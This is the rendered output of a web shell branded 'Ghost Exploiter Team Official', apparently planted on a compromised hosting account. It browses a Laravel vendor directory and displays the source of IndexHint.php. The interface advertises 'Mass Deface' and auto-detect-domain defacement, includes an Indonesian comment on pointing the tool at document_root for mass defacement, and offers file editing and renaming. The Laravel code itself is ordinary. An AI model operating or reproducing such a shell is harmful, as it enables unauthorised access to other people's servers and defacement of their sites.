webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Database
/
Query
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Grammars
--
ren
Processors
--
ren
Builder.php
112.122KB
edt
ren
Expression.php
0.743KB
edt
ren
IndexHint.php
0.499KB
edt
ren
JoinClause.php
3.645KB
edt
ren
<?php namespace Illuminate\Database\Query; class IndexHint { /** * The type of query hint. * * @var string */ public $type; /** * The name of the index. * * @var string */ public $index; /** * Create a new index hint instance. * * @param string $type * @param string $index * @return void */ public function __construct($type, $index) { $this->type = $type; $this->index = $index; } }
<=Back
Liking